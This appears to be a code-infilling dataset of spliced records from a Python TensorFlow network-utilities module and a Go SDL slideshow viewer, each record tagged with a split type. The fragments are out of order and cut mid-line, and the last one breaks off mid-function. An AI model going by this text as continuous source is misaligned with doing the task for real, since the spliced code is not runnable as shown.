# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
| if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | identifier_body | |
network.py | ## Collection of utils for building networks
import numpy as np
import tensorflow as tf
from tensorflow.contrib import layers
from atflow import constraints
def conv2d_output_shape(input_shape, filter_shape, stride, padding):
"""
Computes the shape of the output tensor from conv2d operation with the given configuration
:param input_shape: shape of the input tensor, must be a list, numpy array or TensorShape
:param filter_shape: shape of the convolution filter.
:param stride: stride for the convolution
:param padding: padding mode, either 'VALID' or 'SAME'
:return: shape of the output tensor as a plain list of integers
"""
filter_shape = tf.TensorShape(filter_shape).as_list()
filter_out = filter_shape[-1]
filter_patch_shape = np.array(filter_shape[0:2])
input_shape_list = tf.TensorShape(input_shape).as_list()
batch = input_shape_list[:-3]
input_shape = np.array(input_shape_list[-3:])
stride = np.array(stride)
if padding == 'VALID':
shift = -filter_patch_shape + 1
elif padding == 'SAME':
shift = 0
else:
raise ValueError('padding must be either "VALID" or "SAME", but "%s" was given' % padding)
output_shape = np.ceil((input_shape[:2] + shift) / stride[1:3])
return batch + output_shape.astype(np.int).tolist() + [filter_out]
def conv2d_config(input_shape, output_shape, filter_shape):
"""
Based on the desired input, output and filter shape, figure out the correct 2D convolution configuration to use
including the type (normal or full convolution), stride size, padding type/size
:param input_shape:
:param output_shape:
:param filter_shape:
:return:
"""
input_shape = tf.TensorShape(input_shape).as_list()
if len(input_shape) == 4:
batch_size = input_shape[0]
else:
batch_size = None
input_shape = np.array(input_shape[-3:])
output_shape = np.array(tf.TensorShape(output_shape).as_list()[-3:])
# Determine what kind of convolution to use
if np.all(input_shape[-3:-1] >= output_shape[-3:-1]):
conv_type = "NORMAL"
elif np.all(input_shape[-3:-1] <= output_shape[-3:-1]):
conv_type = 'FULL'
# swap input and output shape
input_shape, output_shape = output_shape, input_shape
else:
raise ValueError('Input shape dimensions must be both bigger than or both smaller than output shape dimensions')
filter_shape = np.array(tf.TensorShape(filter_shape).as_list()[:2] + [input_shape[-1], output_shape[-1]])
stride = np.ceil((input_shape[:2] - filter_shape[:2] + 1) / output_shape[:2]).astype(np.int)
padding = output_shape[:2] * stride - input_shape[:2] + filter_shape[:2] - 1
# Determine what type of padding can be used
if np.all(np.ceil(input_shape[:2] / stride) == output_shape[:2]):
padding_type = 'SAME'
else:
padding_type = 'VALID'
# get padded input shape
input_shape[:2] = input_shape[:2] + padding.astype(np.int)
padded_shape = [batch_size] + input_shape.tolist()
left_padding = np.ceil(padding / 2).astype(np.int)
right_padding = np.floor(padding / 2).astype(np.int)
padding = [[0, 0], [left_padding[0], right_padding[0]], [left_padding[1], right_padding[1]], [0, 0]]
stride = [1, stride[0], stride[1], 1]
return filter_shape.tolist(), stride, padding, padded_shape, conv_type, padding_type
def get_convolution_op(input_shape, output_shape, kernel_shape):
"""
Given the desired shapes of the input, output and filter tensors, returns the shape of the appropriate
convolution filter and a correctly configured op function. The returned op function should be called with the
input tensor and weight tensor, and returns a result of 2D convolution that matches the desired output_shape
:param input_shape: desired input shape into the convolution operation
:param output_shape: desired output shape from the convolution operation
:param kernel_shape: desired convolution kernel shape. Only the first two diemensions (height and width) will be used.
:return: (filter_shape, conv_op) The shape of the appropriate convolution filter/weight to be used (filter_shape) and
a function that can be invoked with inputs tensor and correctly sized filter tensor to define the convolution operation.
"""
filter_shape, strides, padding, padded_shape, conv_type, padding_type = conv2d_config(input_shape, output_shape, kernel_shape)
if conv_type == 'NORMAL':
def conv_op(inputs, weight, name='generic_convolution'):
with tf.name_scope(name):
if padding_type=='VALID' and np.sum(padding) > 0:
inputs = tf.pad(inputs, padding, name='padding')
return tf.nn.conv2d(inputs, weight, strides, padding_type, name='convolution')
else:
def conv_op(inputs, weight, name='generic_convolution'):
if padding_type=='SAME':
padded_output = [padded_shape[0]] + output_shape[-3:]
else:
padded_output = padded_shape
with tf.name_scope(name):
if padded_output[0] is None: | output = tf.slice(output, [0, padding[1][0], padding[2][0], 0],
[-1] + output_shape[-3:], name='cropping')
return output
return filter_shape, conv_op
def normalize_weights(w, dims=(0,), bias=1e-5):
"""
L2 normalize weights of the given tensor along specified dimension(s).
Args:
w: Tensor to be normalized
dims: dimension(s) along which to normalize the Tensor. Defaults to (0,)
bias: Bias value added to the computed norm to prevent dividing by 0. Defaults to 1e-5
Returns: Tensor of same type and shape as `w` whose norm is set to approximately 1 along the specificed dimensions
"""
with tf.name_scope('normalization'):
return w / (tf.sqrt(tf.reduce_sum(tf.square(w), dims, keep_dims=True) + bias))
def weight_variable(shape, name='weight', mean=0.0, stddev=None, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a weight.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'weight'
mean: Optional. Mean of the `random_normal_initializer`. Defaults to 0.0
stddev: Optional. Standard deviation of the `random_normal_initializer`. Defaults to 1e-3
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Weight variable with specified name and shape with random normal initialization.
"""
if stddev is None:
raise ValueError('stddev not specified!')
if initializer is None:
initializer = tf.random_normal_initializer(mean=mean, stddev=stddev)
weights = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(weights)
return weights
def bias_variable(shape, name='bias', value=0.0, initializer=None, constrain=None, dtype=tf.float32):
"""
Creates and returns a variable initialized with random_normal_initializer, suitable for use as a bias.
In the current variable scope, creates (if necessary) and returns a named variable with `tf.random_normal_initializer`.
Args:
shape: Required. Shape of the variable
name: Optional. Name of the variable. Defaults to 'bias'
value: Optional. Constant value to which the variable is initialized. Defaults to 0.0
dtype: Optional. Data type of the variable. Default to `tf.float32`.
Returns: Bias variable with specified name and shape initialized to a constant.
"""
if initializer is None:
initializer = tf.constant_initializer(value=value)
biases = tf.get_variable(name, shape=shape, initializer=initializer, dtype=dtype)
if constrain is not None:
constrain(biases)
return biases
def factorized_readout(inputs, n_outputs=100, constrain=True):
width, height, n_features = inputs.get_shape()[1:].as_list()
n_pixels = width * height
with tf.variable_scope('readout'):
# spatial readout
w_spatial = weight_variable([n_pixels, 1, n_outputs], name='weight_spatial')
if constrain:
constraints.positive_constrain(w_spatial)
w_spatial_norm = normalize_weights(w_spatial, dims=(0,))
# feature readout
w_feature = weight_variable([1, n_features, n_outputs], name='weight_feature')
if constrain:
constraints.positive_constrain(w_feature)
w_feature_norm = normalize_weights(w_feature, dims=(1,))
# scaling
w_scale = bias_variable([n_outputs], name='weight_scale', value=1.0)
if constrain:
constraints.positive_constrain(w_scale)
# total readout weight
w_out = tf.reshape(w_spatial_norm * w_feature_norm * w_scale, [n_pixels * n_features, n_outputs],
'weight_readout')
output = tf.matmul(tf.reshape(inputs, [-1, n_pixels * n_features]), w_out)
return output, w_spatial_norm, w_feature_norm, w_scale, w_out
def batch_norm(inputs, *args, tag=None, add_summary=True, step=0, **kwargs):
if step > 0 and 'updates_collections' not in kwargs:
kwargs['updates_collections'] = 'dump'
output = layers.batch_norm(inputs, *args, **kwargs)
if add_summary:
if tag is None:
tag = inputs.op.name.split('/')[-1]
tag = 'batch_norm/' + tag
tf.histogram_summary(tag, inputs)
tf.histogram_summary(tag + '_bn', output)
return output | batch_size = tf.shape(inputs)[0]
padded_output = [batch_size] + padded_output[1:]
output = tf.nn.conv2d_transpose(inputs, weight, padded_output, strides, padding_type, name='transpose_convolution')
if padding_type=='VALID' and np.sum(padding) > 0: | random_line_split |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H)) | if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
}
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func MainLoop(fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen {
window.window.SetFullscreen(0)
window.fullscreen = false
}
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
} | dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
| random_line_split |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Printf("Failed to create texture: %s\n", err)
}
}
}
func (win *winInfo) displayBar() {
message := "\uF04A \uF04B \uF04E \uF0E2 \uF01E"
surface, err := win.symbols.RenderUTF8Shaded(message, sdlColorWhite, sdlColorBlack)
if err == nil {
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
fmt.Println(err)
}
surface.Free()
width := int32(len(message) * 18)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 120, Y: 500, W: width, H: 40})
texture.Destroy()
} else {
logger.Warning("OMG")
}
}
func resetImg(index int) {
if slide.list[index].texture != nil {
slide.list[index].texture.Destroy()
slide.list[index].texture = nil
}
}
func (win *winInfo) loadAndFreeAround() {
p1 := utils.Mod(slide.current-1, len(slide.list))
p2 := utils.Mod(slide.current-1, len(slide.list))
n1 := utils.Mod(slide.current+1, len(slide.list))
n2 := utils.Mod(slide.current+2, len(slide.list))
n3 := utils.Mod(slide.current+3, len(slide.list))
refresh := utils.IntList{p1, p2, n1, n2, n3}
// preload the previous and next two images
for _, idx := range refresh {
loadImg(win, idx)
}
d1 := utils.Mod(slide.current-3, len(slide.list))
d2 := utils.Mod(slide.current+3, len(slide.list))
if !refresh.Find(d1) {
resetImg(d1)
}
if !refresh.Find(d2) {
resetImg(d2)
}
}
func (win *winInfo) loadCurrentImage(render bool) {
var src, dst sdl.Rect
// load and display the current image
loadImg(win, slide.current)
// Display information of the image
ww, wh := win.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
iw, ih := utils.ComputeFitImage(uint32(ww), uint32(wh), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(ww/2 - int32(iw)/2), Y: int32(wh/2 - int32(ih)/2), W: int32(iw), H: int32(ih)}
if render {
win.renderer.Clear()
win.renderer.Copy(curImg().texture, &src, &dst)
if window.displayInfo {
window.displayPictureInfo()
}
//window.displayBar()
win.renderer.Present()
}
// Update the window title
win.setTitle(slide.current+1, len(slide.list), curImg().path)
// Preload and free images from the list
win.loadAndFreeAround()
}
// Arrange that main.main runs on main thread.
func init() {
runtime.LockOSThread()
// Video only
if err := sdl.Init(sdl.INIT_VIDEO); err != nil {
logger.Warning(err.Error())
}
}
var window winInfo
// MainLoop initializes the SDL package and run the main loop
func | (fullScreen bool, slideshow bool) int {
var event sdl.Event
var src, dst sdl.Rect
var err error
var flags uint32 = sdl.WINDOW_SHOWN | sdl.WINDOW_RESIZABLE | sdl.WINDOW_ALLOW_HIGHDPI
// Load the font library
if err := ttf.Init(); err != nil {
logger.Warning("Unable to open font lib")
}
window.window, err = sdl.CreateWindow(winTitle, sdl.WINDOWPOS_UNDEFINED, sdl.WINDOWPOS_UNDEFINED, winDefaultHeight, winDefaultWidth, flags)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create window: %s\n", err)
return 1
}
defer window.window.Destroy()
// Load resources
if f, err := filepath.Abs(filepath.Dir(os.Args[0])); err == nil {
icon := filepath.Join(f, "app", "icon.bmp")
if i, err := sdl.LoadBMP(icon); err == nil {
window.window.SetIcon(i)
}
font := filepath.Join(f, "app", "fonts", "opensans.ttf")
window.font, err = ttf.OpenFont(font, 14)
if err != nil {
logger.Warning("Unable to load " + font)
}
window.font.SetKerning(false)
font = filepath.Join(f, "app", "fonts", "fontawesome.ttf")
window.symbols, err = ttf.OpenFont(font, 64)
if err != nil {
logger.Warning("Unable to load " + font)
}
}
window.renderer, err = sdl.CreateRenderer(window.window, -1, sdl.RENDERER_ACCELERATED)
if err != nil {
fmt.Fprintf(os.Stderr, "Failed to create renderer: %s\n", err)
return 2
}
defer window.renderer.Destroy()
window.displayInfo = false
window.displayLoading()
window.setTitle(slide.current+1, len(slide.list), curImg().path)
window.loadCurrentImage(false)
// Declare if the image needs to be updated
var update = false
var running = true
for running {
event = sdl.WaitEvent()
switch t := event.(type) {
case *sdl.QuitEvent:
running = false
case *sdl.DropEvent:
fileName := t.File
// Check if picture already in list
found := false
for i := range slide.list {
if slide.list[i].path == fileName {
found = true
slide.current = i
update = true
break
}
}
if !found {
if err := addPic(fileName); err != nil {
sdl.ShowSimpleMessageBox(sdl.MESSAGEBOX_INFORMATION, "File dropped on window", "Cannot add "+fileName, window.window)
} else {
slide.current = len(slide.list) - 1
update = true
}
}
/*case *sdl.MouseMotionEvent:
fmt.Printf("[%d ms] MouseMotion\ttype:%d\tid:%d\tx:%d\ty:%d\txrel:%d\tyrel:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.XRel, t.YRel)
case *sdl.MouseButtonEvent:
fmt.Printf("[%d ms] MouseButton\ttype:%d\tid:%d\tx:%d\ty:%d\tbutton:%d\tstate:%d\n",
t.Timestamp, t.Type, t.Which, t.X, t.Y, t.Button, t.State)*/
case *sdl.WindowEvent:
if t.Event == sdl.WINDOWEVENT_RESIZED || t.Event == sdl.WINDOWEVENT_EXPOSED {
window.window.SetSize(t.Data1, t.Data2)
// Display information of the image
wWidth, wHeight := window.window.GetSize()
src = sdl.Rect{X: 0, Y: 0, W: curImg().W, H: curImg().H}
fitWidth, fitHeight := utils.ComputeFitImage(uint32(wWidth), uint32(wHeight), uint32(curImg().W), uint32(curImg().H))
dst = sdl.Rect{X: int32(wWidth/2 - int32(fitWidth)/2), Y: int32(wHeight/2 - int32(fitHeight)/2), W: int32(fitWidth), H: int32(fitHeight)}
window.renderer.Clear()
window.renderer.Copy(curImg().texture, &src, &dst)
window.renderer.Present()
if window.displayInfo {
window.displayPictureInfo()
window.renderer.Present()
}
}
case *sdl.KeyboardEvent:
if t.GetType() != sdl.KEYDOWN {
break
}
// Get next or previous image
if t.Repeat == 0 {
if t.Keysym.Sym == sdl.K_LEFT {
slide.current = utils.Mod((slide.current - 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_RIGHT {
slide.current = utils.Mod((slide.current + 1), len(slide.list))
update = true
} else if t.Keysym.Sym == sdl.K_PAGEUP {
if err := picture.RotateImage(curImg().path, picture.CounterClockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == sdl.K_PAGEDOWN {
if err := picture.RotateImage(curImg().path, picture.Clockwise); err != nil {
logger.Warning(err.Error())
} else {
resetImg(slide.current)
}
update = true
} else if t.Keysym.Sym == 102 { // F
if window.fullscreen {
window.window.SetFullscreen(0)
} else {
// Go fullscreen
window.window.SetFullscreen(sdl.WINDOW_FULLSCREEN_DESKTOP)
}
window.fullscreen = !window.fullscreen
} else if t.Keysym.Sym == 105 { // I
window.displayInfo = !window.displayInfo
if window.displayInfo {
fmt.Println("Toggle info: on")
window.displayPictureInfo()
window.renderer.Present()
} else {
fmt.Println("Toggle info: off")
update = true
}
} else if t.Keysym.Sym == sdl.K_ESCAPE {
if window.fullscreen {
window.window.SetFullscreen(0)
window.fullscreen = false
}
} else {
fmt.Printf("%d\n", t.Keysym.Sym)
}
}
}
if update {
window.loadCurrentImage(true)
update = false
}
}
return 0
}
| MainLoop | identifier_name |
display.go | package core
//#include <stdlib.h>
import "C"
import (
"fmt"
"os"
"path/filepath"
"runtime"
"strconv"
"github.com/n0dev/go-slideshow/core/picture"
"github.com/n0dev/go-slideshow/core/picture/exif"
"github.com/n0dev/go-slideshow/logger"
"github.com/n0dev/go-slideshow/utils"
"github.com/veandco/go-sdl2/img"
"github.com/veandco/go-sdl2/sdl"
"github.com/veandco/go-sdl2/ttf"
)
const (
winTitle = "GoSlideshow"
winDefaultWidth = 600
winDefaultHeight = 800
)
var (
sdlColorWhite = sdl.Color{A: 0, B: 0, G: 0, R: 0}
sdlColorBlack = sdl.Color{A: 0, B: 255, G: 255, R: 255}
)
// Information about the display window
type winInfo struct {
window *sdl.Window
renderer *sdl.Renderer
font *ttf.Font
symbols *ttf.Font
fullscreen bool
displayInfo bool
}
type imgInfo struct {
path string
H int32
W int32
texture *sdl.Texture
}
// Change the title according to the inputs
func (win *winInfo) setTitle(position int, total int, path string) {
win.window.SetTitle(winTitle + " - " + strconv.Itoa(position) + "/" + strconv.Itoa(total) + " - " + filepath.Base(path))
}
// Create the texture from text using TTF
func (win *winInfo) renderText(text string) (*sdl.Texture, error) {
surface, err := win.font.RenderUTF8Shaded(text, sdlColorBlack, sdlColorWhite)
defer surface.Free()
if err != nil {
return nil, err
}
texture, err := win.renderer.CreateTextureFromSurface(surface)
if err != nil {
return nil, err
}
return texture, nil
}
// displayLoading display loading on background
func (win *winInfo) displayLoading() {
texture, _ := win.renderText("Loading...")
ww, wh := win.window.GetSize()
win.renderer.Copy(texture, nil, &sdl.Rect{X: int32(ww/2 - 50), Y: int32(wh/2 - 1), W: 65, H: 20})
texture.Destroy()
win.renderer.Present()
}
// displayPictureInfo display all information about the picture
func (win *winInfo) displayPictureInfo() {
/* Display exif information */
go func(path string) {
exif.Open(path)
}(curImg().path)
msg := filepath.Base(curImg().path)
texture, _ := win.renderText(msg)
width := int32(len(msg) * 8)
win.renderer.Copy(texture, nil, &sdl.Rect{X: 2, Y: 2, W: width, H: 20})
texture.Destroy()
}
func loadImg(win *winInfo, index int) {
if slide.list[index].texture == nil {
var err error
var surface *sdl.Surface
logger.Trace("load " + slide.list[index].path)
surface, err = img.Load(slide.list[index].path)
if err != nil {
fmt.Printf("Failed to load: %s\n", err)
}
defer surface.Free()
slide.list[index].H = surface.H
slide.list[index].W = surface.W
slide.list[index].texture, err = win.renderer.CreateTextureFromSurface(surface)
if err != nil {
